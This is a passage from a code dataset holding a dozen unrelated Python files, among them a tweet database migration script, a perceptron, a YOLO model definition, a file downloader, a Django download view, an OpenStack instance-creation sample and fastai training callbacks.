'exsists')\n\n # for my_hashtag in srcssn.query(MyTweetHashtags).filter(MyTweetHashtags.tweet_id>803779963203657728).order_by(MyTweetHashtags.tweet_id.asc()).execution_options(stream_results=True).yield_per(10):\n # pg_hashtag=dstssn.query(PgTweetHashtags)\\\n # .filter_by(tweet_id=my_hashtag.tweet_id)\\\n # .filter_by(hashtags=my_hashtag.hashtags)\\\n # .first()\n # if pg_hashtag is None:\n # transfer_tweet_hashtags(my_hashtag)\n # else:\n # print('Hashtag entry', pg_hashtag.hashtags, 'for tweet_id', pg_hashtag.tweet_id, 'exsists')\n\n # for my_mentions in srcssn.query(MyTweetMentions).filter(MyTweetMentions.tweet_id>629296708963319808).order_by(MyTweetMentions.tweet_id.asc()).execution_options(stream_results=True).yield_per(20):\n # pg_mentions=dstssn.query(PgTweetMentions)\\\n # .filter_by(tweet_id=my_mentions.tweet_id)\\\n # .filter_by(mentions=my_mentions.mentions)\\\n # .first()\n # if pg_mentions is None:\n # transfer_tweet_mentions(my_mentions)\n # else:\n # print('Mentions entry', pg_mentions.mentions, 'for tweet_id', pg_mentions.tweet_id, 'exsists')\n\n # for my_tweet_count in srcssn.query(MyTweetCounts).filter(MyTweetCounts.tweet_id>768752069830250500).order_by(MyTweetCounts.tweet_id.asc()).execution_options(stream_results=True).yield_per(20):\n # pg_tweet_count=dstssn.query(PgTweetCounts).filter_by(tweet_id=my_tweet_count.tweet_id).first()\n # if pg_tweet_count is None:\n # transfer_tweet_counts(my_tweet_count)\n # else:\n # print('Count entry for tweet_id', pg_tweet_count.tweet_id, 'exsists')\n\n for my_urls in srcssn.query(MyTweetUrls).filter(MyTweetUrls.tweet_id > 649640455542452224).order_by(\n MyTweetUrls.tweet_id.asc()).execution_options(stream_results=True).yield_per(20):\n pg_urls = dstssn.query(PgTweetUrls) \\\n .filter_by(tweet_id=my_urls.tweet_id) \\\n .filter_by(url=my_urls.url) \\\n .first()\n if pg_urls is None:\n transfer_tweet_urls(my_urls)\n else:\n print('Url entry', pg_urls.url, 'for tweet_id', pg_urls.tweet_id, 'exsists')\n\n # tweets = srcssn.query(MyTweets).yield_per(200).enable_eagerloads(False)\n # with cf.ThreadPoolExecutor(max_workers=4) as executor:\n # try:\n # executor.map(transfer_tweets, tweets)\n # except BaseException as e:\n # print(str(e))\n # raise\n # del tweets\n #\n # tweet_counts = 
srcssn.query(MyTweetCounts).yield_per(1000).enable_eagerloads(False)\n # with cf.ThreadPoolExecutor(max_workers=4) as executor:\n # try:\n # executor.map(transfer_tweet_counts, tweet_counts)\n # except BaseException as e:\n # print(str(e))\n # raise\n # del tweet_counts\n #\n # tweet_cashtags = srcssn.query(MyTweetCashtags).yield_per(1000).enable_eagerloads(False)\n # with cf.ThreadPoolExecutor(max_workers=4) as executor:\n # try:\n # executor.map(transfer_tweet_cashtags, tweet_cashtags)\n # except BaseException as e:\n # print(str(e))\n # raise\n # del tweet_cashtags\n #\n # tweet_hashtags = srcssn.query(MyTweetHashtags).yield_per(1000).enable_eagerloads(False)\n # with cf.ThreadPoolExecutor(max_workers=4) as executor:\n # try:\n # executor.map(transfer_tweet_hashtags, tweet_hashtags)\n # except BaseException as e:\n # print(str(e))\n # raise\n # del tweet_hashtags\n #\n # tweet_mentions = srcssn.query(MyTweetMentions).yield_per(1000).enable_eagerloads(False)\n # with cf.ThreadPoolExecutor(max_workers=4) as executor:\n # try:\n # executor.map(transfer_tweet_mentions, tweet_mentions)\n # except BaseException as e:\n # print(str(e))\n # raise\n # del tweet_mentions\n #\n # tweet_urls = srcssn.query(MyTweetUrls).yield_per(1000).enable_eagerloads(False)\n # with cf.ThreadPoolExecutor(max_workers=4) as executor:\n # try:\n # executor.map(transfer_tweet_urls, tweet_urls)\n # except BaseException as e:\n # print(str(e))\n # raise\n\n print(\"ALL DONE.\")\n","sub_path":"custom_scripts/migration_tools/transfer_final_code.py","file_name":"transfer_final_code.py","file_ext":"py","file_size_in_byte":11752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"17598462","text":"import numpy as np\n\n\nclass Perceptron:\n def __init__(self, w: np.ndarray = None, target_classes: np.ndarray = None):\n self.w = w\n self.target_classes = target_classes\n\n def fit(self, X: np.ndarray, y: np.ndarray, MAX_GUESSES=100_000) -> None:\n \"\"\"Learn seperating hyperplane for 1-D data\"\"\"\n target_classes = np.unique(y)\n if len(target_classes) != 2:\n raise AssertionError(\"More than two classifiers are present.\")\n y01 = (y == target_classes[1]).astype(\"int64\")\n\n # You can append a row or column by getting the size in that axis\n # using a.shape[axis].\n # I.e. for appending a row, you do np.insert(a, a.shape[0], 999, axis=0)\n # and for a column, you do np.insert(a, a.shape[1], 999, axis=1)\n\n # y = mx + b can also be written as [w b] . [x 1]\n\n # w = [w1 w2 ... wk] ---> [w1, w2, ... wk, b]\n\n # X = [x1,1 x1,2 ... x1,k] [x1,1 x1,2 ... x1,k 1]\n # [x2,1 x2,2 ... x2,k] ---> [x2,1 x2,2 ... x2,k 1]\n # [...] [...]\n # [xN,1 xN,2 ... xN,k] [xN,1 xN,2 ... xN,k 1]\n\n X1 = np.insert(X, X.shape[1], 1, axis=1)\n w = np.repeat(0, X1.shape[1])\n\n i, j = 0, 0\n\n while i < X1.shape[0]:\n\n # Classify X1_i using w\n yhat_i = (np.sign(X1[i].dot(w)) + 1) / 2\n\n # Check if yhat_i is incorrect\n if yhat_i != y01[i]:\n\n # Update the weight array; reset i\n if y01[i] == 1:\n w = w + X1[i]\n else:\n w = w - X1[i]\n i = 0\n\n # If yhat_i is correct\n else:\n\n if (i + 1) == X1.shape[0]:\n print(\"Found a separating hyperplane!\")\n break\n\n else:\n i += 1\n\n # Check if MAX_GUESSES has been reached. If not, increment j\n if j == MAX_GUESSES:\n raise AssertionError(\n \"MAX_GUESSES reached. 
Data isn't linearly separable\"\n )\n j += 1\n\n # Update object attributes y_classes and w\n self.target_classes = target_classes\n self.w = w\n\n def predict(self, X: np.ndarray) -> np.ndarray:\n \"\"\"Predict on test data\n\n Notes\n -----\n If Xw + b > 0, we predict result as 1\n else we predict result as 0\n \"\"\"\n if self.w is None:\n raise AssertionError(\"Weights are not defined\")\n if X.shape[1] != len(self.w) - 1:\n raise AssertionError(\n f\"Perceptron was trained on X with {len(self.w)}\",\n \"columns but test has X with {X.shape[1]} columns\",\n )\n\n X1 = np.insert(X, X.shape[1], 1, axis=1)\n yhat = (X1.dot(self.w) > 0).astype(\"int64\")\n preds = self.target_classes[yhat]\n\n return preds\n","sub_path":"perceptron_learning_algo.py","file_name":"perceptron_learning_algo.py","file_ext":"py","file_size_in_byte":3003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"625297403","text":"from setuptools import setup, find_packages\nimport codecs\nimport sys, os\nsys.path.insert(0,'src/')\ninit_pyc = 'src/qam/__init__.pyc'\nif os.path.exists(init_pyc):\n os.remove(init_pyc)\n\nimport qam\n\n\nif os.path.exists(\"doc/source/introduction.rst\"):\n long_description = codecs.open('doc/source/introduction.rst', \"r\", \"utf-8\").read()\nelse:\n long_description = \"See \" + qam.__homepage__\n\nsetup(\n name = \"qam\",\n version = qam.__version__,\n packages = find_packages('src'),\n package_dir = {'':'src'},\n install_requires = ['carrot>=0.6'],\n \n \n # metadata for upload to PyPI\n author = qam.__author__,\n author_email = qam.__contact__,\n description = qam.__doc__,\n long_description=long_description,\n keywords = \"rpc amqp\",\n platforms=[\"any\"],\n url = qam.__homepage__,\n classifiers=[\n \"Development Status :: 3 - Alpha\",\n \"Operating System :: OS Independent\",\n \"Programming Language :: Python\",\n \"License :: OSI Approved :: BSD License\",\n \"Intended Audience :: Developers\",\n \"Topic :: Communications\",\n \"Topic :: System :: Distributed Computing\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n ],\n \n\n)\n\n","sub_path":"pypi_install_script/qam-0.2.18.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"89059700","text":"import click\nimport sklearn.metrics\nimport numpy as np\n\nimport logging\n\nimport helpers\nfrom config import baseline_configurations\nfrom create_model import Model # NOQA\n\n\nclass Baseline:\n def __init__(self, config, input_file=None, input_model=None):\n self.config = config\n self.persistence_path = self.config.PATHS.predictions\n\n if input_file is None and input_model is None:\n self.input_file = helpers.find_latest_file(self.config.PATHS.models)\n self.load_model()\n elif input_file is None and input_model is not None:\n self.model = input_model\n elif input_file is not None and input_model is not None:\n logging.warning('Both an input model file and an input Model object were provided. 
Using the object.')\n self.model = input_model\n elif input_file is not None and input_model is None:\n self.input_file = click.format_filename(input_file)\n self.load_model()\n\n def load_model(self):\n if hasattr(self, 'input_file'):\n logging.info('Loading model {}...'.format(self.input_file))\n else:\n logging.info('Loading model from object...')\n\n self.model = helpers.load_input_file(self.input_file)\n\n def run(self):\n logging.info('Calculating MAE for baseline models...')\n\n actual_ltv = self.model.y_train\n first_order_net_order_value = self.model.dataset.data_train['first_order_net_order_value']\n model_cv_mae = self.model.model_cv_mae\n\n length = len(actual_ltv)\n avg = np.mean(actual_ltv)\n dummy_avg = [avg]*length\n mae_dummy_avg = sklearn.metrics.mean_absolute_error(actual_ltv, dummy_avg)\n\n dummy_first_order = first_order_net_order_value.apply(lambda x: x*3)\n mae_dummy_first_order = sklearn.metrics.mean_absolute_error(actual_ltv, dummy_first_order)\n\n print(model_cv_mae)\n print('Average LTV Prediction Dummy Model MAE: ' + str(mae_dummy_avg))\n print('First Order * Average Order Per User Dummy Model MAE: ' + str(mae_dummy_first_order))\n\n\n@click.command()\n@click.option('--input_file', type=click.Path(exists=True, dir_okay=False))\n@click.option('--config', default='production')\ndef main(input_file, config):\n logging.info('Creating Baseline Models...')\n\n configuration = helpers.get_configuration(config, baseline_configurations)\n\n baseline = Baseline(config=configuration, input_file=input_file)\n\n baseline.run()\n\n\nif __name__ == '__main__':\n logger = helpers.get_logger()\n main()\n","sub_path":"baselines.py","file_name":"baselines.py","file_ext":"py","file_size_in_byte":2560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"236734255","text":"# Author: Bichen Wu (bichen@berkeley.edu) 08/25/2016\n\n\"\"\"YOLO-tiny.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport sys\n\nfrom config import model_config\nimport util\nfrom easydict import EasyDict as edict\nimport numpy as np\nimport tensorflow as tf\nfrom yolo_model import YoloModel\n\nclass YoloVGG16Model(YoloModel):\n def __init__(self, mc):\n mc.LEAKY_COEF = 0 # Set the leaky coefficient to 0 for VGG16\n\n YoloModel.__init__(self, mc)\n\n self._add_inference_graph()\n self._add_loss_graph()\n self._add_train_graph()\n\n def _add_inference_graph(self):\n \"\"\"Build the VGG-16 model.\"\"\"\n\n mc = self.mc\n\n with tf.variable_scope('conv1') as scope:\n conv1_1 = self._conv_layer(\n 'conv1_1', self.image_input, filters=64, size=3, stride=1)\n conv1_2 = self._conv_layer(\n 'conv1_2', conv1_1, filters=64, size=3, stride=1)\n pool1 = self._pooling_layer(\n 'pool1', conv1_2, size=2, stride=2)\n\n with tf.variable_scope('conv2') as scope:\n conv2_1 = self._conv_layer(\n 'conv2_1', pool1, filters=128, size=3, stride=1)\n conv2_2 = self._conv_layer(\n 'conv2_2', conv2_1, filters=128, size=3, stride=1)\n pool2 = self._pooling_layer(\n 'pool2', conv2_2, size=2, stride=2)\n\n with tf.variable_scope('conv3') as scope:\n conv3_1 = self._conv_layer(\n 'conv3_1', pool2, filters=256, size=3, stride=1)\n conv3_2 = self._conv_layer(\n 'conv3_2', conv3_1, filters=256, size=3, stride=1)\n conv3_3 = self._conv_layer(\n 'conv3_3', conv3_2, filters=256, size=3, stride=1)\n pool3 = self._pooling_layer(\n 'pool3', conv3_3, size=2, stride=2)\n\n with tf.variable_scope('conv4') as 
scope:\n conv4_1 = self._conv_layer(\n 'conv4_1', pool3, filters=512, size=3, stride=1)\n conv4_2 = self._conv_layer(\n 'conv4_2', conv4_1, filters=512, size=3, stride=1)\n conv4_3 = self._conv_layer(\n 'conv4_3', conv4_2, filters=512, size=3, stride=1)\n pool4 = self._pooling_layer(\n 'pool4', conv4_3, size=2, stride=2)\n\n with tf.variable_scope('conv5') as scope:\n conv5_1 = self._conv_layer(\n 'conv5_1', pool4, filters=512, size=3, stride=1)\n conv5_2 = self._conv_layer(\n 'conv5_2', conv5_1, filters=512, size=3, stride=1)\n conv5_3 = self._conv_layer(\n 'conv5_3', conv5_2, filters=512, size=3, stride=1)\n pool5 = self._pooling_layer(\n 'pool5', conv5_3, size=2, stride=2)\n\n with tf.variable_scope('fc') as scope:\n fc6 = self._fc_layer('fc6', pool5, 4096, flatten=True)\n dropout6 = tf.nn.dropout(fc6, self.keep_prob, name='drop6')\n fc7 = self._fc_layer('fc7', dropout6, 4096)\n dropout7 = tf.nn.dropout(fc7, self.keep_prob, name='drop7')\n\n num_output = mc.GWIDTH * mc.GHEIGHT * (mc.CLASSES + (1 + 4))\n preds = self._fc_layer('output', dropout7, num_output, activation=True)\n\n self.preds = preds\n","sub_path":"src/yolo_vgg16.py","file_name":"yolo_vgg16.py","file_ext":"py","file_size_in_byte":3024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"194090641","text":"\"\"\"\r\nProvides high-level functions for fetching stuff from the internet.\r\n\"\"\"\r\n\r\nimport shutil\r\nimport requests\r\n\r\n\r\nclass DownloaderError(Exception):\r\n \"\"\"\r\n Errors related to the Downloader\r\n \"\"\"\r\n\r\n\r\nclass Downloader:\r\n \"\"\"\r\n Provides high-level functions for fetching stuff from the internet.\r\n \"\"\"\r\n\r\n ##################################################\r\n # GET REQUEST\r\n ##################################################\r\n\r\n @staticmethod\r\n def get(url):\r\n \"\"\"\r\n Send a GET request to the given URL.\r\n\r\n Parameters:\r\n url: The URL.\r\n\r\n Returns:\r\n response: The requests library response.\r\n error: The error that was generated. None if the request was successful.\r\n \"\"\"\r\n\r\n response = None\r\n error = None\r\n\r\n try:\r\n # Fetch the data.\r\n response = requests.get(url)\r\n # Raise exception if any.\r\n response.raise_for_status()\r\n # If there were no exceptions, the download was successful.\r\n except Exception as err: # pylint: disable=broad-except\r\n error = err\r\n\r\n return response, error\r\n\r\n ##################################################\r\n # DOWNLOAD IMAGE\r\n ##################################################\r\n\r\n @staticmethod\r\n def downloadImage(url, outputPath):\r\n \"\"\"\r\n Download an image to the given path.\r\n\r\n Parameters:\r\n url (str): The image URL.\r\n outputPath (str): The full path (including filename) of the image.\r\n\r\n Returns:\r\n An exception if the download failed. 
None if the download was a success.\r\n \"\"\"\r\n error = None\r\n try:\r\n response = requests.get(url, stream=True)\r\n if response.status_code != 200:\r\n raise DownloaderError(f'Error: Status code {response.status_code}')\r\n with open(outputPath, 'wb') as outputFile:\r\n shutil.copyfileobj(response.raw, outputFile)\r\n del response\r\n except Exception as err: # pylint: disable=broad-except\r\n error = err\r\n return error\r\n\r\n ##################################################\r\n # GET ERROR STRING\r\n ##################################################\r\n\r\n @staticmethod\r\n def getErrorString(err):\r\n \"\"\"\r\n Get the description of the error.\r\n\r\n Parameters:\r\n err: The error.\r\n\r\n Returns:\r\n The description of the error.\r\n \"\"\"\r\n desc = None\r\n try:\r\n raise err\r\n except requests.exceptions.HTTPError as err:\r\n desc = 'An HTTP error occurred.'\r\n except requests.exceptions.ProxyError as err:\r\n desc = 'A proxy error occurred.'\r\n except requests.exceptions.SSLError as err:\r\n desc = 'An SSL error occurred.'\r\n except requests.exceptions.ConnectTimeout as err:\r\n desc = 'The request timed out while trying to connect to the remote server.'\r\n except requests.exceptions.ReadTimeout as err:\r\n desc = 'The server did not send any data in the allotted amount of time.'\r\n except requests.exceptions.Timeout as err:\r\n desc = 'The request timed out.'\r\n except requests.exceptions.ConnectionError as err:\r\n desc = 'A Connection error occurred.'\r\n except requests.exceptions.URLRequired as err:\r\n desc = 'A valid URL is required to make a request.'\r\n except requests.exceptions.TooManyRedirects as err:\r\n desc = 'Too many redirects.'\r\n except requests.exceptions.MissingSchema as err:\r\n desc = 'The URL schema (e.g. http or https) is missing.'\r\n except requests.exceptions.InvalidSchema as err:\r\n desc = 'The URL schema is invalid.'\r\n except requests.exceptions.InvalidHeader as err:\r\n desc = 'The header value provided was somehow invalid.'\r\n except requests.exceptions.InvalidProxyURL as err:\r\n desc = 'The proxy URL provided is invalid.'\r\n except requests.exceptions.InvalidURL as err:\r\n desc = 'The URL provided was somehow invalid.'\r\n except Exception as err: # pylint: disable=broad-except\r\n desc = 'An unexpected error occurred.'\r\n return desc\r\n","sub_path":"downloader.py","file_name":"downloader.py","file_ext":"py","file_size_in_byte":4376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"440448094","text":"\"\"\"\nLeetCode\nPython3\n-*- coding: utf-8 -*-\n\n@Problem : 291. 
Word Pattern II.py\n@Difficulty : \n\n@AUTHOR : Yvette WANG\n\n@Description\n\"\"\"\n\nfrom copy import deepcopy\n\n\n# hard, v1, brute-force + dynamic programming, 7476ms, 229.8 MB\nclass Solution(object):\n def wordPatternMatch(self, pattern, str):\n \"\"\"\n :type pattern: str\n :type str: str\n :rtype: bool\n \"\"\"\n\n symbol_chars = {}\n self.visited = {}\n\n return self.guess_component(pattern, str, symbol_chars)\n\n def guess_component(self, remain_pattern, remain_str, symbol_chars):\n if len(remain_pattern) == 0 and len(remain_str) == 0:\n return True\n elif len(remain_pattern) != 0 and len(remain_str) != 0:\n if self.visited.get((remain_pattern, remain_str, tuple(symbol_chars.items())), 0) == 0:\n if symbol_chars.get(remain_pattern[0], 0) == 0:\n self.visited[(remain_pattern, remain_str, tuple(symbol_chars.items()))] = False\n for length in range(1, len(remain_str) + 1):\n if (remain_str[:length], length) not in symbol_chars.values():\n symbol_chars_temp = deepcopy(symbol_chars)\n symbol_chars_temp[remain_pattern[0]] = (remain_str[:length], length)\n if self.guess_component(remain_pattern[1:], remain_str[length:], symbol_chars_temp):\n self.visited[(remain_pattern, remain_str, tuple(symbol_chars.items()))] = True\n break\n else:\n if symbol_chars[remain_pattern[0]][0] == remain_str[:symbol_chars[remain_pattern[0]][1]]:\n self.visited[(remain_pattern, remain_str, tuple(symbol_chars.items()))] = \\\n self.guess_component(remain_pattern[1:], remain_str[symbol_chars[remain_pattern[0]][1]:],\n symbol_chars)\n else:\n self.visited[(remain_pattern, remain_str, tuple(symbol_chars.items()))] = False\n else:\n self.visited[(remain_pattern, remain_str, tuple(symbol_chars.items()))] = False\n\n return self.visited[(remain_pattern, remain_str, tuple(symbol_chars.items()))]\n\n\nif __name__ == \"__main__\":\n pattern = \"abab\"\n str = \"redblueredblue\"\n\n # pattern = \"aaaa\"\n # str = \"asdasdasdasd\"\n #\n # pattern = \"aabb\"\n # str = \"xyzabcxzyabc\"\n #\n # pattern = 'd'\n # str = 'e'\n #\n # pattern = \"ab\"\n # str = \"aa\"\n\n print(Solution().wordPatternMatch(pattern, str))","sub_path":"291. Word Pattern II.py","file_name":"291. 
Word Pattern II.py","file_ext":"py","file_size_in_byte":2642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"184470697","text":"'''\ndef hellocounter (name):\n count=[0] \n def counter():\n count[0]+=1\n print 'Hello,',name,',',str(count[0])+' access!'\n return counter\n\nhello = hellocounter('ma6174')\nhello()\nhello()\nhello()\n'''\n#±Õ°ü\ndef deco(func):\n print(\"before myfunc() called.\")\n func()\n print(\" after myfunc() called.\")\n return func\n \ndef myfunc():\n print(\" myfunc() called.\")\n \nmyfunc = deco(myfunc)\n \nmyfunc()\nmyfunc()\n","sub_path":"zqx_python/main/bibao.py","file_name":"bibao.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"431943329","text":"import csv\nimport pandas as pd\n\n\nclass HOperator:\n\n def __init__(self):\n # self.name_of_directory = 'test/'\n self.name_of_directory = 'Assignment with a cellular operator/'\n self.new_directory = 'New log files/'\n self.result_directory = 'Result/'\n\n def chunkIt(self, seq, num):\n avg = len(seq) / float(num)\n out = []\n last = 0.0\n\n while last < len(seq):\n out.append(seq[int(last):int(last + avg)])\n last += avg\n\n return out\n\n def reducer(self, log_file):\n df = pd.read_csv(log_file)\n df = df.pivot_table(values='Speed', index='Day', aggfunc='median')\n return df\n\n def process_files(self, log_file):\n old_log_file = self.name_of_directory + log_file\n new_log_file = self.new_directory + log_file\n with open(old_log_file, newline='') as File:\n with open(new_log_file, 'w', newline='') as NewFile:\n day = 1\n reader = csv.reader(File, delimiter=',')\n writer = csv.writer(NewFile, delimiter=',')\n\n writer.writerow([\"Day\", 'Time', 'Speed'])\n next(reader) # Пропускаем первую строку\n first_row = next(reader)\n first_minute, speed = int(float(first_row[1][1:]) / 60), float(\n first_row[2][1:]) # Получаем первый отсчёт и количество байт\n\n number_speeds_in_minute = 1\n\n for row in reader:\n minute = int(float(row[1][1:]) / 60)\n\n if int(row[0]) != day or minute != first_minute:\n average_in_minute = speed / number_speeds_in_minute\n writer.writerow([day, first_minute, average_in_minute])\n first_minute = minute\n day = int(row[0])\n speed = 0\n speed += float(row[2][1:])\n number_speeds_in_minute = 1\n else:\n speed += float(row[2][1:])\n number_speeds_in_minute += 1\n\n average_in_minute = speed / number_speeds_in_minute\n writer.writerow([day, first_minute, average_in_minute])\n\n def chunk_process(self, chunk):\n list(map(self.process_files, chunk))\n\n def chunks_mapper(self, chunk):\n name_of_h = chunk[0].split('.')[1]\n general_df = pd.read_csv(self.new_directory + chunk.pop())\n\n for i in chunk:\n df = pd.read_csv(self.new_directory + i)\n general_df = pd.concat([df, general_df], axis=0)\n\n general_df = general_df.groupby(['Day', 'Time']).sum()\n new_name_of_file = 'Result/' + name_of_h + '.csv'\n general_df.to_csv(new_name_of_file)\n return self.reducer(new_name_of_file)\n\n def chunk_max_speed(self, chunk):\n df = pd.read_csv(self.result_directory + chunk[0])\n df = df.groupby([\"Day\"])[\"Speed\"].max()\n return df\n\n def chunk_sum_max_speed(self, chunk):\n key_of_chunk = list(chunk.keys())[0]\n df = pd.read_csv(self.result_directory + key_of_chunk+'.csv')\n week = chunk[key_of_chunk]\n h_sum_speed = chunk\n for day in range(1, 8):\n df_i = df.where(df['Day'] == day).where(df['Speed'] > float(week[day]))['Speed'].sum()\n 
h_sum_speed[key_of_chunk][day] = df_i\n\n return h_sum_speed\n\n\n\n\n\n","sub_path":"map_reduce_operator.py","file_name":"map_reduce_operator.py","file_ext":"py","file_size_in_byte":3501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"465277585","text":"#!/usr/bin/env python\nimport os\nimport sys\nimport time\n# Please Check if novaclient was installed.\ntry:\n import novaclient.v1_1.client as nvclient\nexcept:\n print('Please install Nova client first.')\n sys.exit(1)\n\n# The QMULUS access URL.\nauth_url = 'https://172.16.17.1:5000/v2.0'\n# Tenant name for the user.\nproject_id = 'myproject'\n# User name who crearted the searching VM\nusername = 'demo'\n# Password of username.\napi_key = 'demo'\n# SSL Key to communicate with QMULUS.\ncacert = '/home/ubuntu/arcus_ca.pem'\n# Name of your Instance(VM) to be created.\nvm_name = 'demo-vm'\n# Image Name to create the Instance.\nimage_name = 'ubuntu_12.04-pwd'\n# Network Name to be used by the Instance of the user Tenant.\nnetwork_name = 'net_demo'\n# Flavor of the creating Instance.\nflavor_name = 'm1.small'\n# KeyPair Name\nkeypair_name = 'my_keypair'\n# Floating IP pool name\nfip_pool_name = 'net_external'\n\n\n# Create a nova client.\nnova = nvclient.Client(auth_url=auth_url, username=username,\n api_key=api_key, project_id=project_id,\n cacert=cacert)\n\n# Get information of all images.\n#nova_images = nova.images.list()\n# Get information of all networks of the tenant.\n#nova_networks = nova.networks.list()\n# Get information of all flavors.\n#nova_flavors = nova.flavors.list()\n\n# Get ID of the image.\nimage = nova.images.find(name=image_name)\nimage_id = image.id\nimage_resp_name = image.name\n# Get ID of the network.\nnet = nova.networks.find(label=network_name)\nnet_id = net.id\nnet_resp_name = net.label\n# Get ID of the flavor.\nflavor = nova.flavors.find(name=flavor_name)\nflavor_id = flavor.id\nflavor_resp_name = flavor.name\n\n# Allocate a new Floating IP address.\nnew_fip = nova.floating_ips.create(pool=fip_pool_name)\n\n\"\"\"\n# List all floating IP and you can choose a free one to assocaite.\nfip_list = nova.floating_ips.list()\nfor fip in fip_list:\n print '-' * 100\n print fip.id\n print fip.ip\n print(\"instance_id : %s\" % fip.instance_id)\n print(\"pool : %s\" % fip.pool)\n\"\"\"\n\n# Start to create an instance.\nnics = [{'net-id': net_id}]\ninstance = nova.servers.create(name=vm_name, image=image,\n flavor=flavor, nics=nics)\n# If you want to use Key to access your instance.\n #, key_name=keypair_name)\n\n# Check if instance is created and ok.\ntime.sleep(10)\n# Make Sure name is Unique or use id for search.\nserver = nova.servers.find(name=vm_name)\nprint('Instance: %s, status: %s' % (vm_name, str(server.status)))\n\n# Assocaite floating ip to the Instance.\nnova.servers.add_floating_ip(server, new_fip.ip)\n\ntime.sleep(5)\n\n# Delete the Instance.\nserver.delete()\n\ntime.sleep(5)\n\n# Delete the Allocated floating IP\nnova.floating_ips.delete(new_fip.id)\n","sub_path":"nova/python/sample_nova_create_vm_cmd01.py","file_name":"sample_nova_create_vm_cmd01.py","file_ext":"py","file_size_in_byte":2749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"380716576","text":"import os, re\nfrom datetime import datetime\nfrom django.conf import settings\nfrom django.http import HttpResponse, Http404\nfrom django.shortcuts import render\nfrom django.views.static import serve\n\n# Create your views here.\n\ndef 
index(request):\n suffixes = [\".mkv\", \".avi\", \".mp4\", \".m4v\"]\n context = {\n 'films' : []\n }\n for directory in sorted(os.listdir(settings.MEDIA_ROOT)):\n film = {}\n film['directory'] = directory\n film['filename'] = \"\"\n for f in os.listdir(settings.MEDIA_ROOT + \"/\" + directory):\n for suffix in suffixes:\n if f.endswith(suffix):\n film['filename'] = f\n context['films'].append(film)\n return render(request, 'display/index.html', context)\n\ndef download(request, directory, filename):\n filepath = settings.MEDIA_ROOT + directory + \"/\" + filename\n with open(\"/log.txt\", \"a\") as f:\n timestr = datetime.strftime(datetime.now(), \"%y%m%d%H%M%S\")\n f.write(\"%s Downloading %s...\\n\" % (timestr, str(filename)))\n f.close()\n return serve(request, os.path.basename(filepath), os.path.dirname(filepath))\n","sub_path":"display/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"12265596","text":"def factOrSum(x, word):\r\n\r\n total = 1\r\n\r\n if word == \"factorial\":\r\n for i in range (1, x + 1):\r\n total = total * i\r\n\r\n return total\r\n\r\n else:\r\n\r\n total = 0\r\n\r\n for i in range (0, x + 1):\r\n total = total + i\r\n\r\n return total\r\n\r\nprint(factOrSum(5, \"sum\"))","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"600804236","text":"import json\n\nimport torch\nimport numpy as np\n\nfrom fastai.torch_core import *\n\nfrom fastai import *\nfrom fastai.vision import *\n\nfrom myfastai import MyLearner, LearnerCallback\n\n\n@dataclass\nclass TrackerCallback(LearnerCallback):\n \"A `LearnerCallback` that keeps track of the best value in `monitor`.\"\n monitor: str = 'val_loss'\n mode: str = 'auto'\n\n def __post_init__(self):\n super().__post_init__()\n\n if self.mode not in ['auto', 'min', 'max']:\n warn(\n f'{self.__class__} mode {self.mode} is invalid, falling back to \"auto\" mode.')\n self.mode = 'auto'\n mode_dict = {'min': np.less, 'max': np.greater}\n mode_dict['auto'] = np.less if 'loss' in self.monitor else np.greater\n self.operator = mode_dict[self.mode]\n\n def on_train_begin(self, **kwargs: Any)->None:\n self.best = float('inf') if self.operator == np.less else -float('inf')\n\n def get_monitor_value(self):\n values = {'trn_loss': self.learn.recorder.losses[-1:][0].cpu().numpy(),\n 'val_loss': self.learn.recorder.val_losses[-1:][0]}\n for i, name in enumerate(self.learn.recorder.names[3:]):\n values[name] = self.learn.recorder.metrics[-1:][0][i]\n if values.get(self.monitor) is None:\n warn(\n f'{self.__class__} conditioned on metric `{self.monitor}` which is not available. 
Available metrics are: {\", \".join(map(str, self.learn.recorder.names[1:]))}')\n return values.get(self.monitor)\n\n\n@dataclass\nclass EarlyStoppingCallback(TrackerCallback):\n \"A `LearnerCallback` that terminates training when monitored quantity stops improving.\"\n min_delta: int = 0\n patience: int = 0\n\n def __post_init__(self):\n super().__post_init__()\n if self.operator == np.less:\n self.min_delta *= -1\n\n def on_train_begin(self, **kwargs: Any)->None:\n self.wait = 0\n super().on_train_begin(**kwargs)\n\n def on_epoch_end(self, epoch, **kwargs: Any)->None:\n current = self.get_monitor_value()\n if current is None:\n return\n if self.operator(current - self.min_delta, self.best):\n self.best, self.wait = current, 0\n else:\n self.wait += 1\n if self.wait >= self.patience:\n print(f'Epoch {epoch}: early stopping')\n return True\n\n\n@dataclass\nclass SaveModelCallback(TrackerCallback):\n \"A `LearnerCallback` that saves the model when monitored quantity is best.\"\n every: str = 'improvement'\n name: str = 'bestmodel'\n\n def __post_init__(self):\n super().__post_init__()\n\n def on_epoch_end(self, epoch, **kwargs: Any)->None:\n if isinstance(self.every, int):\n if (epoch % self.every) == 0:\n 